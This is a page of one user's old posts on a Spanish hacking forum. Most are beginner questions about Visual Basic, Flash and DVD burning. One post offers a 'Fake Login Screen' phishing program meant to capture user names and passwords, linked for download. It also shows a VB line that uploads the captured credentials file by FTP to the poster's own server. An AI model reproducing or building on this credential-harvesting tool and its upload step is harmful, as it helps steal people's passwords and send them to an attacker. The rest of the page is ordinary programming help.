elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Temas
Páginas: 1 [2] 3 4
11  Media / Diseño Gráfico / Flash - Navegar por fotogramas en: 4 Marzo 2007, 02:15 am
Hola.

Hace muy poco que aprendí a utilizar Macromedia Flash, pero no sé  programar en Actionscript. El caso es que estoy haciendo una web y querría hacer unos botones los cuales al click cargasen una sección. De momento lo único que he conseguido es que al hacer click se cargue un clip de película, lo cual parece no ser muy útil...

Código:
on (release) {
tellTarget (\"/seccion1\") {
gotoAndPlay(1);
}
}

Me gustaría hacerlo por fotogramas, si alguien me pudiese hacer un ejemplo le estaría agradecido.

salu2
12  Programación / Programación Visual Basic / Sencillo pero útil Fake Login Screen en: 28 Octubre 2006, 18:04 pm
Lo hice hace un tiempo y por lo visto me fue muy pero que muy bien  ;D Y como me lo pidieron por otro subforo subo el codigo en VB, solo hay que ajustarlo a vuestras preferencias y compilarlo...

http://www.flypicture.com?display=updone&id=qNrwland

Si quieres que el programa suba el .txt que contendrá los user y passwords, tendréis que añadir el componente llamado "Microsoft Internet Tranfer Control 6.0" y añadir este simple códgio:

Código:
Inet1.Execute "ftp://usuario:contraseña@ftp.usuarios.lycos.es (aqui el nombre de dominio de vuestro proveedor ftp, en mi caso es lycos)", "PUT information.txt " & "information.txt"

AVISO: Con FTP´s de No-ip no funciona...

salu2

13  Programación / Programación Visual Basic / Guardar .txt con nombre aleatorio (¿random?) en: 9 Octubre 2006, 18:29 pm
Necesito hacer que una aplicación guarde ficheros .txt con un nombre al azar, de manera que nunca se creen 2 .txt´s con el mismo nombre. Tengo este code:

Código:
Open ("nombre_al_azar.txt") For Output As #1

Utilicé la función random para otras cosas pero nunca para esto  :huh: Me vale también si el nombre del difchero están compuesto por un número...lo único que se me ocurre es crear un variable que vaya creciendo según el timer...pero nosé si estaría correcto  :huh:


De antemano gracias, y salu2 para los miembros del foro
14  Programación / Programación Visual Basic / Cambiar el Interval de milisegundos a segundos en: 8 Octubre 2006, 14:19 pm
No me acepta valores con más de 5 cifras...hay alguna forma para que lo haga?

De antemano gracias.
15  Programación / Programación Visual Basic / Ejecutar aplicación mediante teclas en: 7 Octubre 2006, 22:15 pm
Se podría hacer una aplicación que ejecutase una aplicación situada en un path al pulsar una(s) tecla(s) programadas por tí? De ser así cual sería el code?

Gracias.
16  Programación / Programación Visual Basic / Ayuda con mi Mini-WinXP (lo cuelgo) en: 1 Octubre 2006, 19:54 pm
Estoy haciendo un Mini windows...aunque no voy a hacer un explorer, xD, esto es algo básico con lo que espero desarrolar conocimientos en VB...Pero si que voy a hacer un "panel de control" desde el cual se podrán modificar "cosas" de tu WinXP (el original, xd). Si tenéis alguna sugerencia para añadirle al miniXP, no dudéis en decírmela  ;)

También me gustaría saber como hacer referencia a una "parte" de un STATUSBAR. Pensé hacerlo mediante el index pero nosé de que manera ponerlo...por ejemplo ahora al darle a la barra de herramientas se visualiza mi menu inicio...y yo quier que se visualice solo cuando se le de al boton Inicio, xD me explico?  :huh: Este es el code actual del menu inicio:

Código:
Private Sub menu_PanelClick(ByVal Panel As MSComctlLib.Panel)
menuinicio.Visible = True
Label1.Visible = True
Label2.Visible = True
Label3.Visible = True
Label4.Visible = True
Label5.Visible = True
Line1.Visible = True
Label6.Visible = True
End Sub

Weno lo entenderéis mejor viendo el programa...y por último me gustaría saber como hacer un menú tipo WinXP...que por ejemplo al situar el ratón encima de "Todos los programas" apareciesen los programas...Si no me explico decídmelo plizz!!

Cuelgo el ejecutable porque si no, no carga la barra de herramientas ni el fondo, xD, aunque si algún newbie como yo le interesa el code lo cuelgo...

http://www.flypicture.com/file/?id=qNjwlqTZ

P.D: Si le dais al elemento del menu inicio llamado "Salir de mi S.O." y os aparece un joker diciendo que formatea vuestro PC,  ;D trankilos es inofensivo, además al final lo dice...

salu2

17  Programación / Programación Visual Basic / Editor.De.Texto: Tamaños en Combobox, y errores en Commondialogs en: 11 Septiembre 2006, 23:03 pm
Estoy haciendo un editor de texto (sencillito  ;D), weno de echo, ya solo me falta solucionar los errores que me da el VB cuando cancelo la operación de abrir o guardar como  :huh: En mi editor utilizo un menú (creado con menú editor) para abrir estos controles. Digo que utilizó un menú porque con commandbuttons no me pasa, lo que me lleva a pensar que el problema puede estar en alguna propiedad. Pero la propiedad de CancelError está a false  :huh: (el número de error es diferente).

Los errores al cancelar las operaciones de showopen y showsave están en la misma línea (al menos eso dice el depurador...).

Al abrir...

Código:
Open CD1.FileName For Input As #1

Al guardar...

Código:
Open CD1.FileName For Output As #1

Hace poco que empecé con vb, tal vez el fallo sea obvio  :-[


Después me gustaría crear un combobox mediante el cual el tamañao de la letra de un textbox cambiase según el número de letra que se eligiera (se que se puede hacer con la propiedad .showfont de un commondialog, esto ya lo hago más por aprender qu epor otra cosa, xd). Para ello se me ocurrió utilizar la sentencia case, la cual no la conozco muy bien pero pensé que sería capaz de hacerlo  :rolleyes: La sentencia If tampoco funcionó...Pensé que sería algo como esto:

Código:
Dim i As Integer
For i = 12 To 20 'En realidad solo tengo las fuentes en los tamaños 12, 16, y 20

Next i
Select Case List
Case 12
txtbox.Font.Size = 12
Case 16
txtbox.Font.Size = 16
Case 20
txtbox.Font.Size = 20
End Select

La cosa me extraño porque mediante un menú creado con el menú editor si funcionó:

Código:
Dim i As Integer
For i = 0 To 2
Next i
Select Case Index
Case 0
txtbox.Font.Size = 10
Case 1
txtbox.Font.Size = 12
Case 2
txtbox.Font.Size = 14
End Select

Lo bueno es que mediante el menú podía crear una matriz de controles mediante la propiedad index, pero en el combobox la única forma de hacer referencia a los elementos de list (es con esta propiedad, eso CREO).


Os estaría agradecidos si me hechaseis un cable con esto  :-\

Gracias. Salu2!
18  Programación / Programación Visual Basic / Activar Timer cuando el contenido de un textbox sea un Valor Numérico en: 5 Septiembre 2006, 13:53 pm
Al menos sé ( ;D ) que el código tiene que ser algo como esto:

Código:
If Text1.text = "aqui no se que poner...." Then
Timer1.enabled= True
Else
Msgbox "Introduzca un valor numérico"
End if

Tal vez se pueda hacer poniendo una variable...en este caso, de que tipo habría que declararla, y cómo quedaría??  :huh:

Gracias de antemano.



19  Programación / Programación Visual Basic / Bug en mi programilla...¿Como solucionarlo? en: 21 Agosto 2006, 19:08 pm
Wenas, es mi 1º post en este subforo, :o como es evidente soy un Newbie. Hace unos días que empecé a programar, y weno practicando los ejemplos llegué a crear un programilla simple, pero se adapta a mis necesidades...excepto por el bug, xd.

Os explico, el programilla (Cliquéame v1.0, xd) trata sobre acertar un acertijo. Y como me gusta complicarme la vida, no e puesto un simple textbox en el que si das la respuesta correcta ya as terminado el programano nop...en el programa "incrusté" una calculadora (típica de newbie, xd). Por medio de la calculadora es como me gustaría validar la respuesta. Es decir, siguiente el procedimiento "matemático que hay que seguir para resolver dicho acertijo.

Ejemplo: La calcu tiene 3 textbox (1. valor, 2º, y resultado). Bien pues quiero que cuando en el text1 y text2 el valor introducido por el usuario sea de "x", y que cuando cliquee sobre el botón de sumar que aparezca un label (label.visible=true).

El bug está en que da iwal que valores pongas que cuando cliquees sobre el botón de sumar te aparece el label diciendo que acertaste, xDD. Probé con esto:

Código:
Private Sub Command5_Click(Index As Integer)
If Text1(0) Or Text2(2) = 1 Then
Label9.Visible = True
Else
Label9.Visible = False
End If
End sub

Pero de todas todas acaba apareciendo el dichoso label como ya comenté... Y además el VB no carga el resto del código que hay puse en el command5...

Después se me ocurrió utilizar un If para cuando el Resultado (text3), sea el del acertijo ("xx") que mostrase el label. Claro, esto funcionaba, pero el problema está en que el usuario puede introducir un valor cualquiera más otro valor cualquiera y que el resultado sea el mismo ("xx"). Y esto deje de pensarlo, porque no tiene salida.

Lo que si creo que se puede arreglar es el code que posteé más arriba. El código completo del comando sumar es este:

Código:
Private Sub Command5_Click(Index As Integer)
If Text1(0) Or Text2(2) = 1 Then
Label9.Visible = True
Else
Label9.Visible = False
End If
If Text1(0).Text = 1 Then
Label5.Caption = "¡CORRECTO!"
Label5.BackColor = vbGreen
Else
Label5.Caption = "Inténtalo de nuevo..."
Label5.BackColor = vbRed
End If
If Text2(2).Text = 1 Then
Label6.Caption = "¡CORRECTO!"
Label6.BackColor = vbGreen
Else
Label6.Caption = "Inténtalo de nuevo..."
Label6.BackColor = vbRed
End If
Text3(1).Text = Val(Text1(0).Text) + Val(Text2(2).Text)
End Sub

Dejo el enlace para que os podáis descargar mi programilla (Cliqueame v1.0) .Por si alguna empresa decide comprármelo  ;D

http://www.flypicture.com/?display=updone&id=r9H2m6nY

Weno, pues ai alguien sabe donde está el fallo le agradecería muxo que me lo dijera. Salu2!
20  Media / Multimedia / Como meto más de 3 capítulos (cap./350mb) en un DVD? en: 7 Abril 2006, 18:24 pm
Hola! Me gustaría poder meter más de 3 capítulos (350 mb por cap.) en formato .vob (dvd) en un DVD 4,7 GB.

Hasta ahora utilizo el Nerovision Express para grabar las series, y no me permite meter mas de 3 capítulos de 350 mb por DVD. ¿Hay alguna forma aunque sea disminuyendo la calidad de imagen para poder meter mas de 3 capítulos?

No tengo información en esta materia, me gustaría que me ayudarais, si hay alguna forma para hacer esto, agradecería que también me dijerais con que programa podría hacerlo.

Gracias y un saludo.
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines